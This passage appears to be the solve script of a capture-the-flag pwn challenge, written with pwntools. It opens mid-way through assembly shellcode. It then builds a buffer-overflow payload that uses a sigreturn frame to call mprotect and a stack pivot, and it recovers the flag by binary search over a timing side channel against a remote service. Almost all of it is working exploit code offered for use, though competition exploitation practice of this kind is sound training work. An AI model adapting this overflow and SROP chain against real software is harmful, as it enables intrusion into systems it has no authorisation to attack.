mov rsi, 0x404F60
mov rdx, 1
syscall
L_EXIT:
'''
code += shellcraft.exit(0)
shellcode = asm(code)
def test(idx, ch):
if REMOTE:
p = remote('47.108.206.43', 37910)
else:
p = process('./chall')
pay1 = shellcode
pay1 = pay1.ljust(0x100, b'A')
pay1 += b'A'*0x8
pay1 += p64(0x401193)
pay1 += p64(syscall)
frame = SigreturnFrame()
frame.rax = constants.SYS_mprotect
frame.rdi = 0x404000
frame.rsi = 0x1000
frame.rdx = 7
frame.rsp = bss+0x210
frame.rip = 0x401186
pay1 += bytes(frame)
pay1 += p64(0x404060)
# gdb.attach(p, 'b *0x40118E')
# sleep(1)
p.sendafter(b"easyhack\n", pay1)
p.recvline()
payload = b'A'*0x2A
payload += p64(bss+0x100)
payload += p64(0x401441) # level; ret
p.send(payload)
p.send(p8(idx)+bytes([ch]))
t = time.time()
p.clean(0.3)
t = time.time()-t
p.close()
print(t)
return t > 0.28
flag = ""
for i in range(len(flag), 36):
l = 0x2D
r = 0x66
while l < r:
mid = (l+r)//2
res = test(i, mid)
if res:
r = mid
else:
l = mid+1
print(l, r, chr(l), chr(r))
flag += chr(l)
print(flag)
print('flag{'+flag+'}')